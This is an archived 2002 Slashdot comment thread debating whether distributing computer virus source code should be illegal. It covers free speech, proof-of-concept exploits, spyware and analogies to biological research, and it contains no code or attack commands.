Follow Slashdot stories on Twitter

 



Forgot your password?
typodupeerror
×
News

Should Virus Distribution be Illegal? 436

mccormi writes "In a guest editorial on Newarchitect Sarah Gordon looks at whether posting malicious code should be allowed and what steps could be taken to stop it. What's worrisome though is that restrictions on malicious code doesn't take into account who it's malicious against and what truly defines malicious." Note that she's not talking about actually infecting computers, but merely making the code available for others to examine (and for some of them, no doubt, to try to spread in the wild).
This discussion has been archived. No new comments can be posted.

Should Virus Distribution be Illegal?

Comments Filter:
  • by NeoSkandranon ( 515696 ) on Friday April 12, 2002 @02:42PM (#3331172)
    Unless the law specified dstribution of *machine readable* malicious code (ie binaries) then MS et.al. could start nailing those who post proof-of-concept code to demonstrate the flavor of the week exploit in IIS or WinxP or what have you...more security by obscurity, yippee
    • MS et.al. could start nailing those who post proof-of-concept code

      It will be a while before MS et al. will have the authority to enforce laws. They're best they can do is press charges.

      • To: Good Citizen posing as an evil hacker by exposing our own stupidity
        From: The Law Offices of Bend, Over, and Takeit.

        Dear Sir:

        You have recently refered to a website that had discussed the possibility of posting conceptual code that exposes an embarassing hole in our client's poorly constructed software.

        To wit, this is notice that we are suing you for millions of dollars pending your decision to withdraw your comments and acknowlege Bill Gates as lord of the universe.

        You have until the end of this sentence to comply.
    • This sets a dangerous precedent.

      By outlawing the distribution / posting of software deemed "malicious", it becomes only a matter of time until someone attempts to apply it to security tools such as nmap, ethereal, and any/all proof of concept exploits.

      The distribution of "malicious" code should be regulated (or intentionally unregulated) much the same as file sharing should be: posting things for others should be legal ; using things for illegal and malicious acts should not .

      The problem, though, is the impossibility of catching everyone who uses a "malicious program" once it has been posted. Much like peer-to-peer file sharing, once something is online, it is difficult or impossible to contain. Hence, a paradox: legislators intelligently see that the only way to truly stop these nuisances is to stop it at the source, the single point of failure; unfortunately, this seems to violate fair use and free speech principles. The only way to stop these nuisances is to trample on protected principles.

      I, unfortunately, see no easy solution to this problem.
    • Unless the law specified dstribution of *machine readable* malicious code (ie binaries)

      Even better, I could write a compiler that takes the US Constitution as "source" and compiles it into a virus-like binary, and TADA, the Constitution is illegal to distribute!
      • by cybermage ( 112274 ) on Friday April 12, 2002 @03:47PM (#3331597) Homepage Journal
        the Constitution is illegal to distribute!

        And you think the People in Charge (tm) have a problem with that?

        Did you know that there is a company in Texas (I've forgotten their name) that has the copyright on a Standardized Municipal Code in use across the US and that they don't allow licensees (i.e., cities) to publish it. In many places, if you want to read your city's laws, you need to pay for a license or go down to city hall and read their copy. I swear I'm not making this up.

        Ignorance of the law is no excuse. That'll be $20 for your copy.
      • the Constitution is illegal to distribute!

        The constitution, the idea of rule by law, christianity, buddhism, open source... are all viruses of the mind. The US founding fathers distributed the Declaration of Indepence around with the express malicious intent of throwing the Brits out on the arses.

        Come to think of i1t, the anti virus law itself is a piece of logic a lawyer designed and executed in the court system with the intent of getting back at the people who made their computer crash.
    • by ebyrob ( 165903 ) on Friday April 12, 2002 @03:39PM (#3331555)
      In a guest editorial on Newarchitect Sarah Gordon looks at whether criticizing large corporations for their mistakes and shoddy products should be allowed and what steps could be taken to stop it. What's worrisome though is that restrictions on criticism don't take into account who it's against and what truly defines criticism." Note that she's not talking about actually infecting computers, but merely making the criticism available for others to examine (and for some of them, no doubt, to use as a tool for damaging corporate profits).

      From the article:
      It's true that the scientific community encourages research, but only when it's conducted within the ethical boundaries of a given discipline.

      So let me get this strait... It's ethical to create software that has tons of security exploits, and spies on unsuspecting users who purchase it, but it's unethical to give people the tools they need to test their systems for vulnerability and gaurantee security for their own piece of mind. It might be OK to give such tools to large corporations, but private individuals just shouldn't need that kind of privacy...
  • Hmm. (Score:4, Funny)

    by Renraku ( 518261 ) on Friday April 12, 2002 @02:42PM (#3331174) Homepage
    I think it should be illegal to write and release viruses. Viruses should follow all standard software rules, which means, the maker could easily be sued for damages. And no, sending the virus with a EULA wouldn't protect the maker legally.
    • Re:Hmm. (Score:3, Insightful)

      by 56ker ( 566853 )
      What along the lines of

      If this virus causes you problems with your computer the author cannot be held legally responsible.

      Do you agree [Y/Yes]?
    • Re:Hmm. (Score:5, Interesting)

      by Slynkie ( 18861 ) <jsalit@NospAM.slunk.net> on Friday April 12, 2002 @02:57PM (#3331270) Homepage
      Ugh.

      Code is -art-.

      When I was but a wee hacker, I used to LOVE reading virus source code. I would download all I could find (granted, at the time, it was from BBS', or sneaker-net), and let me tell ya, I learned much more from those virus' than I ever learned in any mainstream assembler class I've taken.

      And no, I -never- used the code for malicious purposes. It was just amazingly interesting to me.

      To make it illegal to write ANY type of code is just insane; and if you distribute it without disguising it as something else, what's the real problem??
      • Code is -art-.

        Garbage is art. Landscapes are art. Campbell's soup cans are art. A broken stereo is art.

        My point is, anything can be art. That doesn't mean it MUST be allowed to be distributed.

        We're not talking about a film that portrays graphic violence, or erotic art, which may or may not "corrupt" children. Viruses directly do damage, and that's the difference.

        While we shouldn't go on a witch hunt to end virus code distribution, you can't just say "art" and make it untouchable.

        mark
        • Re:Hmm. (Score:3, Insightful)

          by Slynkie ( 18861 )
          Heh, that made me imagine some little 1337 H4X0R kid running around stabbing people with pieces of trash or empty soup cans.

          Anyways, my intent was not to end the discussion by simply calling it "art". My point was, there -are- some reasons that distribution of virus code (note, I -do- say code and not executables) should not be made illegal, beyond the problem of "what constitutes malicious code" and "free speech". Virus code is -interesting-.

          Beyond that though, I think this is very similar to the Anarchist's Cookbook argument...should writings detailing how to make bombs and other harmful objects be illegal to distribute? I certainly don't think so, it's way too much loss of freedom for an indeterminable amount of safety in my book. And we're possible talking real, physical harm to real people with that.
          • Beyond that though, I think this is very similar to the Anarchist's Cookbook argument...should writings detailing how to make bombs and other harmful objects be illegal to distribute? I certainly don't think so, it's way too much loss of freedom for an indeterminable amount of safety in my book. And we're possible talking real, physical harm to real people with that.

            That's a good point, definitely, but I think it's still worse with computer viruses. The anarchist's cookbook is right on the line, and I'm not sure exactly where I stand on that. But I think there is still a difference, in that the book describes how to do these bad things, and the virus actually does these bad things.

            I don't doubt that virus code is interesting, and things can be learned from it. I could even see the actual propogation of a virus to be an artistic expression (like a "happening"). But there's sometimes things that are very interesting or cool that are still illegal, and being interesting or art is not enough reason by itself to allow it to be spread around.

            Maybe being a little too forgiving is better than making too much illegal, I don't know. It's definitely not a cut-and-dry thing. But I think it's a good approach to look at it similarly to bio-viruses.

            mark.
    • Re:Hmm. (Score:4, Insightful)

      by dasmegabyte ( 267018 ) <das@OHNOWHATSTHISdasmegabyte.org> on Friday April 12, 2002 @03:24PM (#3331457) Homepage Journal
      Really? Well, I got this virus the another night that was intentionally installed along with KaZaa. The virus watches every packet I send across the internet and reports it back to the hackers that control it.

      Some people call it "ad ware" or "annoyance ware," but since I didn't want it, it reduces the effectiveness of my PC, and I wasn't alerted to its presence, I consider it a virus.

      Can I sue the manufacturers for damages?
    • Re:Hmm. (Score:3, Insightful)

      by Restil ( 31903 )
      I know this was written somewhat in jest, but should the creator of the rm command be held liable because someone got careless with the -rf option?

      Some programs by design can, if used improperly, cause a great deal of damage. Certainly, someone using a program to delete files can't exactly claim ignorance if the program actually DELETES the files they told it to.

      So what if I download a program, and the eula specifically warns met that running the program will spread itself to 100 people and promptly wipe all accessible harddrives. That's what the program was SUPPOSED to do, and it specifically stated that in a document that by default almost nobody reads.

      Outlook, or any email program for that matter, has features that allow you to forward messages to other people. So when someone receives a message, if an executable attachment is automatically run (because the email program allows that function), a message pops up explaining that the user's computer "will now send 100 copies of the current message to anyone/everyone it can find, then wipe the disk, press ok to continue"... and the idiot user presses ok without ever reading the message, who's to blame here?

      Yes its a virus (or a worm if you would). Yes, its intent is malicious. But the user gave permission to execute it, just as if the user gave permission to erase his computer by using deltree /y \ instead.

      What's truely sad here, is a virus based on the previous model would probably spread just as well as your typical covert variety.

      -Restil
  • is spyware viral? (Score:3, Interesting)

    by hobbitsage ( 178961 ) on Friday April 12, 2002 @02:43PM (#3331177)
    would spyware be included in the categorization? It could be argued that it is viral in intent if not propigation.
    • spyware is not malicious, although I'm not sure the same thing can be said about its creators ...
    • Hm? You're using the term 'viral' pretty broadly there, since propagation is a major part of the defintion...

      OTOH, it would be interesting if somebody managed to go after spyware on the basis that the user didn't explicitly authorize such behavior. However, that's a huge can of worms, because computer programs are so incredibly complicated that one could split hairs ad infinitum (e.g. "Please authorize the program to write saved game files. Please authorize it to read the disk to load files. Please authorize this registry key. Please authorize me to receive keystrokes." et al), much akin to the nastiness between MSFT and the gov't regarding what exactly constitutes a core part of an operating system -- that is, where the boundaries are.

      Perhaps specific legislation regarding the not-explicitly-authorized monitoring of a user's behavior outside of the program would help -- recording keystrokes clearly fed to the program would be fine, but poking around what the user does with other programs wouldn't be. That would be an incomplete approach, but it might be better than what the present situation is.
  • Well... (Score:5, Insightful)

    by IronTek ( 153138 ) on Friday April 12, 2002 @02:43PM (#3331179)
    Though no one likes to get a virus, and I often wonder who writes them and for what reasons, I do believe that there probably is much information to be gained from their examination as far as system function goes. From a learning standpoint, those who write them, while having too much free time on their hands, are learning some hard-core programming concepts, as are those who fight them. For the casual programmer, taking a peek at their code every now and then can actually be beneficial. But, as always, it's the person that can make good code cause bad things and vice-versa. As always, it comes down to the person, not the code. The code itself should not be illegal. Knowledge cannot be locked up, and if it is, it can break free in a dangerous way. Better to have it out in the open where the "good guys" can combat it if needbe, and everyone can learn from it.
    • It is painful for me to hear people continue to attempt to defend this position.

      The stance that it is somehow idealogically immoral to put constraints on the availability of dangerous information in our current society is not only without a rational defense, but completely ignores the reality that such information can directly lead to a massive amount of harm.

      The problem with allowing all information to be free, under the premise that any bad result of its use is the fault of the person using it, is that modern society's infrastructure is rapidly tending toward a state where information can lead directly to action.

      Imagine, for instance, that you are an expert engineer who was magically transported to a pre-civilized era. Would the vast body of knowledge that you posessed help you, in that era, take actions that effect any significant amount of change? Would you, in fact, be able to do anything with the advanced information that you posess in such a situation?

      In earlier times, it was entirely ok to spread any and all information, because the worst that the information could do would be to change somebody's opinion on a political matter or teach somebody how to make a shoddy weapon (read: a stick) of minor consequence. In the near future, one will be able to transmit a digital specification for a weapon to be fabricated on one's personal fab-lab. The person won't require any knowledge the specification or even of how a computer or fabrication machine works -- they will just have to buy the machine at home depot, download a spec for their weapon of choice from a web-site, and posses the insanity to want to use the thing against society.

      I think it's entirely all-too clear that such demented individuals exist. What has kept the world safe thus far has been a lack of easily-available information (you must still be a geek to find computer cracking scripts), and a relatively weak amount of computer-based power (personal fab-labs are really expensive, and not very powerful).

      But this won't be the case in the future. We've already seen many technologies help your average Joe break the law at the click of his mouse by employing a highly-refined and easy-to-use user interface -- just take a look at Napster and its clones. Clearly the very availability of Napster enabled thousands and millions to break laws that they would have not broken previously. The only difference between a Napster and a Code-Red virus is that Napster allowed one to violate a law is arguably detrimental to society. It won't be long until these products allow your everyday Joe Bin Laden to inflict *serious* damage to society at his whim.

      It'd be great if information could always be free, but unless we restrict dangerous forms of it, we are simply giving up our safe way of life. Although one might *want* to give arbitrary individuals access to all information, you're essentially allowing arbitrary individuals the power to do anything they desire. This system will eventually lead to catastrophe, because you cannot make the entire world's population obey an honor system.
      • Because it's difficult or impossible to define what exactly is "dangerous" speech. In fact, as soon as you start outlawing speech because it's "dangerous" rather than actually harmfull (and even that is hard to define) you quickly get into definitions of "dangerous" that include "works against the status quo".

        For example, look at Napster - I dispute your argument that people wouldn't have broken those copyright laws anyway - how many people make copies of tapes for thier friends? It's simply that Napster allowed it on a SCALE that hadn't been seen before. And I'm somewhat of the argument that if the majority of people, when given the opportunity to break a law, would do so then we need to re-think the law. Especially when the result of breaking the law causes no direct harm to anyone.

        However, rather than considering that we might want to re-think copyright law, into something more compatibile with modern technology, instead they simply drop even heavier bombs and try to legislate it out of existence.

        This attitude toward speech is like the Victorian attitude toward sex - if you keep it in the dark where nobody can see it, we can all pretend it doesn't exist - but it still does. Keeping it in the open means that everyone knows it's there, and we can all talk about it. Yes, some people will abuse it - but I'd rather get hit by something I know about and can prepare for, than something which is kept secret and underground and that I don't even know about.

      • It is painful for me to hear people say that "a point of view is dangerous."

        First, we already have a lot of readily-available "dangerous" information, such as how to make napalm, pipe bombs, or homemade poisons. We have since before the advent of the internet. And I mean before 1969, not 1993. The information about how to kill one or several people is not hard to find, and never has been.

        Second, cracking and counter-cracking technologies are running an arms race, where exploits run a smaller chance of causing damage as time goes by. Some of the counter-cracking measures may advance because of altruism, but they are significantly hastened when a proof-of-concept demonstration is released to "arbitrary" parties (i.e., security-minded software consumers--the general public). They cannot afford the perception of sitting still while their security measures are overtaken.

        This is why your time-travel argument makes no sense, because you are deliberately speculating about an impossible scenario, one that does not exist in the world today or in a foreseeable future, and using it as a basis to restrict basic freedoms. Who's being dangerous now?

      • by Jerf ( 17166 ) on Friday April 12, 2002 @04:34PM (#3331962) Journal
        Without going into a point-by-point rebuttal, of course "that point of view is extremely dangerous". And of course much of what you said is plausible, inasmuch as wacked-out examples made for the purpose of outrage and extremism is plausible. (That's not sarcasm; it's a common rhetorical device that is serious overused and abused, but it's still somewhat valid when understood correctly.)

        But you provide no evidence that of the two alternatives, yours is better. Your scenarios are for the most part equally applicable to the hiding case; instead of information spreading openly, it spreads covertly. Doesn't change much. You can't keep information from a determined person; people are just too smart.

        I'd say that the post you are replying to is much better constructed as an argument, because it says why the alternative is better: The good guys can find it and learn from it. How is your proposal better? The bad guys still find it*. Now maybe the good guys don't. The "demented person" scenarios remain.

        Step up a meta level. You're focusing too tightly on a small part of the problem, and missing the global implications.

        I say that both revealing and hiding the information is dangerous. The danger comes from people, and therefore cannot be removed from the equation. (This is what you implicitly try to do, by hiding the information. The problem is, the information is not the danger.) But of the two alternatives, open discussion is clearly the preferable choice, both in theory, and in practice.

        (*: Proof: Look at the real world. Happens all the time. This is undeniable.)
      • It'd be great if information could always be free, but unless we restrict dangerous forms of it, we are simply giving up our safe way of life. Although one might *want* to give arbitrary individuals access to all information, you're essentially allowing arbitrary individuals the power to do anything they desire. This system will eventually lead to catastrophe, because you cannot make the entire world's population obey an honor system.


        The biggest problem with this line of thinking is that without the research being done on this stuff, there's no way to develop defenses. Someone is going to develop it eventually, and without the necessary defenses then everybody will be vulnerable. It's like you said, "because you cannot make the entire world's population obey an honor system."
    • Re:Well... (Score:2, Funny)

      by WMNelis ( 112548 )
      Code doesn't kill, people do!
    • ...then only outlaws will have viruses.
  • Of course not (Score:3, Insightful)

    by jvbunte ( 177128 ) on Friday April 12, 2002 @02:44PM (#3331190) Journal
    How is posting potentially harmful virus code any different than posting OS vulnerabilities and exploits? If this were to become law, how long would it take a certain OS manufacturer to extrapolate that same concept to cover all 'malicious' code fragments that could be used to target their OS?

    I don't like people who write viruses, I like getting them even less, however censoring the ability to post/review it is just another step in the slippery slope towards censorship of other things.
    • I don't like people who write viruses
      do you mean that, or do you mean "I don't like people who distribute viruses to the general public without there specific knowledge"?

      There are good reasons for writing viruses, such as proof of concept.
    • Furthermore, if distributing harmful code in nonexecutable form for the purpose of study and discussion, wouldn't it be far, far worse to distribute harmful binaries that cause loss of data, as Word and Excel often do?
  • Of course, the perfect virus in this case would be one that

    • emails itself to everyone in your MS address book, and
    • then posts its own details under your name to a web site somewhere.

    Suddenly everyone who has ever been infected becomes a criminal for posting the virus' replication mechanism!

  • by Demon-Xanth ( 100910 ) on Friday April 12, 2002 @02:46PM (#3331202)
    The DMCA had the intentions of eliminating piracy, however it ended up being used to fight battles that never should have been fought. If MS releases an OS with a known backdoor, does that count as malicious? If someone makes a program that utilizes this backdoor in a way that MS did not intend (regardless of in a good way or bad way), can MS claim this as malicious? Would NTFSDOS be considered malicious since it bypasses NTFS's protection?

    This is one of those issues where a law cannot be both effective and fair. And possibly not either.
  • If you're using mailicious code for analyzation so it can be diffused, yes.


    The more known the code becomes, the easier it is to counter it.


    It also separates the wheat from the chaff in terms of IT employees. Whoever keeps up is a valuable resource in a sea of lax workers

  • by Dephex Twin ( 416238 ) on Friday April 12, 2002 @02:48PM (#3331218) Homepage
    I like the idea of thinking about biological and computer viruses in the same way.

    Researching biological viruses is legal, although people could attempt to spread said viruses maliciously. Those who deal with lethal viruses and diseases often can't just make samples and research easily accessible to anyone, even anonymous people. Why should virus "researchers" be able to do what is essentially the same thing?

    Free speech is good, research is good... but so are ethics and responsibility.

    mark
    • .. but the tools to create biological viruses are not (generally speaking) available to my next door neighbours 14 year old. So, I'm not as interested in being aware of the nitty gritty details of potential biological threats.

      Viruses, however .. enjoy a freedom in the form of 0$ in startup costs. Yes, it makes the posted code all that much more likely to be exploited, but it also means I'm at more risk in casually being infected at any point in time by anybody, regardless of their access to biological and chemical lab equipment.

      Which is why I'd rather be aware of the nitty gritty details myself, so I can take appropriate action, such as stopping from running the software or patching the software myself, depending on the severity of the exploit and the true to life trivialness of its implementation and propogation. I've always felt that tha bad will __always__ happen, and the worst you can do is keep the good guys in the dark.
      • The whole point is that the good guys are really the ones who *would* have legal access to this stuff.

        Maybe you can download viruses, examine them, and then better protect yourself as a result, but you should realize that you are not part of the 99.999999% who don't have the knowledge, time, or desire to study virus code in order to "protect" themselves. So Joe average-computer-victim is getting nothing out of it being available.

        I feel fine letting Symantec et al worry about studying viruses. I don't think we need to keep virus code distribution legal so that the few "freelance" virus-stopper folk can do the equivalent of chasing trespassers off their property with a shotgun. It isn't a good enough reason. If you really want to actively stop viruses by examining them, maybe you should take up that profession.

        mark
        • Of course, then we have to ask: how does one get considered part of the profession in the first place?

          Certification? Being an employee of a certified company? (Either of which I'm sure would be a good solution -- from Symantec's point of view)? Simply declaring oneself a virus researcher, which may be difficult if you don't have the background because you didn't have access before?
          • Of course, then we have to ask: how does one get considered part of the profession in the first place?

            Certainly that is an important consideration. I'm not sure of all the specifics of researching biological viruses, but I feel like the analogy could work for that as well. Bio-virus researchers have to get some sort of clearance, and computer virus researchers should have similar structure.

            Some guy couldn't suddenly declare himself a biological virus researcher, and it should be the same with computers, IMO.

            mark
        • by dillon_rinker ( 17944 ) on Friday April 12, 2002 @03:49PM (#3331612) Homepage
          I feel fine letting Symantec et al worry about studying viruses.
          I feel fine letting Sun worry about Java.
          I feel fine letting Microsoft worry about computer security.
          I feel fine letting the LAPD internal affairs department worry about police corruption.
          I feel fine letting the military worry about war.

          In general, I feel fine about letting the fox worry about the henhouse.
          • Ah yes, a "slippery slope" argument.

            What is with people today?

            My point was, at least I know who Symantec is, and can hold them accountable for things. No, I don't entrust my soul unto them, but I sure trust them more then Mr. AnonUser8000!

            mark
            • Your ability to make those judgments about trust, and to change them if circumstances warrant, is what's at stake here. what if those conspiracy theories about Symantec engineers writing viruses in order to promote their own products are true? You'd want to be able to re-evaluate who you trust, right?

              Here's something to keep in mind. You know how whenever an article comes up about unethical behavior by a corporation, someone always brings up the fudiciary responsibility thing? About how companies HAVE to make money, and they can be held liable if they don't do everything in their power to make money? Are you sure you want a company like that in charge of, well, anything? (Come to think of it, doesn't this mean if Symantec ISN'T driving sales of Norton AV by releasing viruses, they should be?)

            • MORON.

              The US has a "slippery slope" legal system.

              I don't care what your high school english told you about rhetoric, when speaking of law a "slippery slope" argument is perfectly acceptable. It reflects the way that the system ACTUALLY WORKS.

              ...and good luck TRYING to hold Symantec accountable.


    • Those who deal with lethal viruses and diseases often can't just make samples and research easily accessible to anyone, even anonymous people. Why should virus "researchers" be able to do what is essentially the same thing?


      The bar for experts working with dangerous biological agents is pretty high. And rightfully so. However, the limitations to who can explore techology is considerably lower. This goes for information security issues as well.


      Who is to say who is the expert? Would you limit such research and tools to industry professionals?


      Despite the claims of some IT industry PR spin campaigns (and the apparent discomfort of some professionals), much of the state of Infosec tools and knowledge exists because of the work done by individuals outside traditional institutions.


    • I like the idea of thinking about biological and computer viruses in the same way.

      Sure. And I like the idea of thinking about pizza and manhole covers in the same way too. I mean, after all, they're roughly the same size, pretty much the same shape, and if you were to map out their distribution in the universe you'd find that they pretty much cluster around the same places. Why should I have to go to all the trouble of keeping them distinct in my head?

      The only problem is, when I start lumping things because of superficial similarities, I wind up making all sorts of wonky logic errors. So I have to be very careful to not be misled and to actually think about things, no matter how much easier it would be to grab a glib analogy and just run with it.

      -- MarkusQ

      • Sure. And I like the idea of thinking about pizza and manhole covers in the same way too. I mean, after all, they're roughly the same size, pretty much the same shape, and if you were to map out their distribution in the universe you'd find that they pretty much cluster around the same places. Why should I have to go to all the trouble of keeping them distinct in my head?

        Yes, why ever use analogies? Since we can easily make completely useless analogies, let's just forget them altogether!

        If you really think my analogy wasn't any good, why not support that with evidence having to do with viruses, instead of saying that analogies are wrong?

        Yes, one could theoretically lump things together inappropriately with analogies. I used an analogy, therefore I must have done that!

        Right.

        mark
  • Microsoft smiling...
    Lawyers call products "viral",
    Court can't get source code.
  • by dryueh ( 531302 ) on Friday April 12, 2002 @02:51PM (#3331236)
    Well..this issue raises some interesting, and very classic, ethical issues.

    Freedom of speech is protected, and rightly should be, but there are limitations to that freedom and even --gasp-- responsibilities. Writing codes for viruses, or supplying them to the public, isn't bad in itself--it's the usage of them were the ethical complications come in. Thus, one could claim that simply posting the code for viruses is fine...the people to be blamed are the ones using that code for negligent purposes.

    The same could be true for yelling 'FIRE' in a crowded theatre, right? If a avalanche of trouble ensues, the fault must lie in those people who push over old ladies to get out of the theatre first, right? I mean, the person who yells fire may have played a role in facilitating all the chaos, but the actual causers of the injury are those running around..

    Of course, these two scenarios are completely different (being the virus/yelling fire), but raise similar points. Freedom of speech doesn't make you free from responsiblity of your chosen speech...whether that's yelling 'Fire' or writing/supplying codes for viruses..

    • This comes up a lot, and every time I think that shouting "FIRE" shouldn't be a problem if the theatre:
      • isn't full of highly flammable materials;
      • has adequate fire escapes.

      Likewise, writing a virus shouldn't be a problem if operating systems run untrusted code in a sandbox, and people don't propogate them carelessly.
  • The United States Constitution protects free speech, but virus writing and subsequent distribution aren't pure speech. Rather, they're speech plus action. The U.S. Supreme Court has recognized that speech and action, while closely intertwined, aren't one and the same. Thus, the act of putting virus code on the Internet isn't necessarily protected.

    I have to strongly disagree with this. Putting up information on the web that shows a person how to write a virus or a DoS bot or anything else is purely free speech, it's the free release of information. The action she's talking about here is the action of posting information, which is not malicious at all.

    To further illustrate her misguided logic by being absurd, let's apply this reasoning to other realms. By her logic, if you teach a person to use a gun, and that person takes that knowledge and shoots and kills someone, then you should go to prison for murder. Sorry, that doesn't fly. Just because you know how to write a virus and teach others how to write a virus, it's not illegal until you compile that source and make an effort to infect computer systems with that virus.

    Information, no matter what can be done with it, is never "good" or "bad" - it's what you do with that information, the actions you take, that are good or bad.

    Like it or not, even virus code should be protected under the First Amendment. However, for actually implementing and distributing a virus, there should be stiffer penalties.

    • By her logic, if you teach a person to use a gun, and that person takes that knowledge and shoots and kills someone, then you should go to prison for murder.

      No, that's wrong. If you teach someone to shoot a gun, and then they go and kill someone, it's true that you shouldn't be held responsible for that person's actions.

      Her point is something different. If you give a loaded handgun to someone and they run out the door and shoot someone, you're an accessory...right? There's a difference between supplying someone with knowledge versus supplying them with a weapon.

      So, if we teach someone how to program and they use that programming knowledge to write virus code, that's not our fault. However, if we give someone the code for a virus program and they simply release into the mainstream, I don't think many people would argue that we played a role in that destruction.

  • Sarah Gordon: Call it your constitutional right, but the truth is that it's morally wrong.

    It's our constitutional right, but it should be illegal?

  • by coyote-san ( 38515 ) on Friday April 12, 2002 @02:55PM (#3331258)
    Damn it, what part of "Freedom of Speech" do people not get?

    History has made it clear that the people pay dearly when free speech, esp. free speech regarding a matter of community security, is abridged. Telling us that Acme locks are easily broken does not protect us from criminals who are too dumb to figure it out for themselves, it only serves to give us a false sense of security.

    (As an aside, this is also the foundation of some of the most damning condemnations I've seen of "child protection" laws. As some judges have observed, the true obscenity is attempting to protect minors from all adult concerns until their 18th birthday... at which point they are thrown to the wolves with absolutely no preparation for the very real challenges adults must face.)

    A virus exchange site is similar. Yes, there will be some idiots (who deserve to have the full wrath of the law on them for their acts) who will use those viruses for ill will. But the same sites will also allow others to be warned that viruses against this specific software exists and is in the wild. No more Microsoft stonewalling about the existence of such attacks. No more trivializing them as highly specialized and not a concern to the average user.

    This is a bit scary... but that's part of being an adult. A child can go to bed at peace that the closet is empty of monsters, but part of being an adult is knowing that there are bad guys out there *and* that you've done everything you can to keep them away. I, for one, and getting damn tired of my self-appointed "betters" trying to infantilize me.
    • As strongly as I may disagree with Sarah Gordon's conclusions, I simply can't bring myself to brand her proposed methods as a violation of our "free speech" rights.

      She's not suggesting that laws be enacted to restrict the spread of educational virii. (Indeed, she says that most computer criminals are relatively unconcerned with the illegality of their acts.) Rather, she wants to make the distribution of them moral anathema. In her ideal world, posting ILoveYou source code to your site would be the equivalent of walking around a mall handing out Aryan Nation literature: legal but morally repugnant.

      Basically, Gordon wants to counter one form of free expression (educational virii) with another (public disgust). Yup -- free speech operating as intended.

      Do I agree with her opinions? Dear god, no. In fact, Gordon's idea to indoctrinate children from first-boot sounds eerily like the recent conservative push for teaching abstinence in schools. But she's got every right to try and advance her agenda through whatever constitutional means she has available to her.

  • by CMiYC ( 6473 ) on Friday April 12, 2002 @02:57PM (#3331272) Homepage
    Although not directly related to the article, I did get an idea. Some may say this is slightly off-topic, but we'll see. I've picked "test equipment" because I want a reputable source. Meaning, this scenario would be a honest accident.

    Okay so I write some code for a piece of test equipment. Let's just pick an example situation. I don't want to argue if this is a good or bad idea, but say I did it anyway. Every once in a while the machine checks to see if it is slipping its calibration. If it is, it contacts some server to say "hey look at me." Then the server responds and says "yeah I see you." Well with my expansive programming skills I accidentally code a bug. Let's say instead of contacting the intended target, I just start contacting anything I can find. Well another analyzer sees my cries for help and starts yelling too. See where I am going?

    The code was never intended to broadcast huge amounts of useless traffic. It happened by accident. I picked this haphazard example to be similar to Code Red. The machines are basically messaging, like mad, between each other. So does this mean my company or I should have charged (civil or criminal) against us? I say no, but I'm sure a lawyer would scream yes.
    • The "Oops, we didn't MEAN to do that" defense is not particularly strong in product liability cases if you're being accused of negligence. It may mean that the penalty is less than that of deliberate malfeasance (e.g. a potentially lethal safety defect in a car will probably result in a far greater penalty if the manufacturer decided that it was cheaper to settle lawsuits than to fix it), but it won't absolve you.
  • Symantec makes anti-virus software. The technical success of such software depends on information about viruses. The commercial success of such sofware depends on the vendor having information about viruses that other organizations or people do not have!

    If people can freely exchange information about viruses, they can also develop their own anti-virus solutions independently of the vendors of anti-virus software.

    One more point. I think it's easy for vendors of this software to slip into thinking that all such information is their intellectual property. In fact, they are probably not above writing and distributing viruses to stay in business, so that viruses may be *in fact* their IP; of course they would be against people reverse engineering their code in open discussion forums. Who knows; there may even be some inadvertant clue in there somehow revealing the origin of the virus, which would expose and ruin the virus/anti-virus developer.
    • The commercial success of such sofware depends on the vendor having information about viruses that other organizations or people do not have!

      An incorrect assumption. There is a "gentleman's agreement" between the vendors that require that if a virus sample is submitted to one, the others get it, too. The companies compete on technology, speed of response, quality of response, support, and any number of other things. But they don't hide virus samples from each other.

      In fact, they are probably not above writing and distributing viruses to stay in business

      Another canard. There are enough virus writers in the world to make this quite unnecessary. Most of the AV company's response teams have enough work to do without some secret internal cabal of virus writers making more.

  • by bluGill ( 862 ) on Friday April 12, 2002 @03:01PM (#3331306)

    I can distribute instruction on how to turn a gun into a machine gun, that is legal.
    I can legaly distrbute instructions on how to make drugs.
    It is legal to distribute instructions on how to make bombs.
    I can join a club that intends to destroy the current goverment.
    I can legally plan a murder.

    In all of the above situations, following though and doing the act in question is illegal. However knowing how to do it, and discussing it is not. However once it is done, not only is the act illegal, but possessing/doing the above turns it from a legal act to a conspirecy which makes the act a high crime.

    But we are not even talking about the above situations where there are no legal reason to use that information. Instead we have:

    I can buy and use lockpick.
    I can own and shoot a gun
    I can own and use a car.
    I can drink alcohol

    All of the above are legal, and have legal uses. all can be used illegally.

    Likewise there is benifit from distributing the source code for a virus. Programers should study such things to understand how they work. Only through such understanding can we go the next step and write programs that prevent them from working. (This is an arms race, virus writters are getting better all the time, so we need to get better)

    • "I can join a club that intends to destroy the current government.
      I can legally plan a murder."

      I do agree with your point, but you need to back the truck up a bit. Both of the actions above fall under Conspiracy. Conspiracy to overthrow the government (might be a shaky charge if you are just a member of the club but don't take part in any planning) and conspiracy to commit murder. The second one especially is no joke and you WILL go to jail if caught doing it.
      • You're wrong about planning a murder being a crime. A good mystery writer would likely pay almost excrutiating detail to every aspect of a murder that is to occur in a story he or she is writing. The plans alone, no matter how detailed, cannot be legally construed as intent. Additional evidence would always be required to demonstrate intent.
  • I hate crackers and virus writers as much as any genuine hacker. But as troublesome as they are they would pale in comparison with the trouble governments are capable of unleashing.

    These kinds of regulations and restrictions are a short sighted response to irresponsible behavior on the part of anti social personalities. They do nothing to address the source of the problem and are therefore not a solution but simply an additional problem.

    Lee
  • I've read a bunch of posts claiming "writing software is free speech" and similar arguments that aren't really answering the question "Should Virus Distribution be Illegal?"

    I have no problem with people writing viruses for educational/programming exercises and the like, as long as they are kept in a controlled environment.

    At any point, however, when the virus gets loose (so to speak) the distributor (not necessarily the author) of the virus should be held accountable (criminally, financially) for whatever damage it does. Free speech ends when it compromises the rights (and property) of others.

  • by Philbert Desenex ( 219355 ) on Friday April 12, 2002 @03:03PM (#3331327) Homepage
    Sarah Gordon may have some good points. It's hard to tell.

    She never bothers to define the term "virus" in a way that an arbitrary individual (me or an intellectual property lawyer or a World Court Judge) can use to determine whether or not some source code constitutes a "virus".

    If she follows Fred Cohen's definition ("sequences of instructons in machine code for a particular machine that make exact copies of themselves somewhere else in the machine" - "A Short Course on Computer Viruses" 2nd ed ISBN 0-471-00769-2 John Wiley & Sons 1994) which is pretty much an english transliteration of the mathematical definition - even things like /bin/cat or /bin/cc become "viruses" under some circumstances.

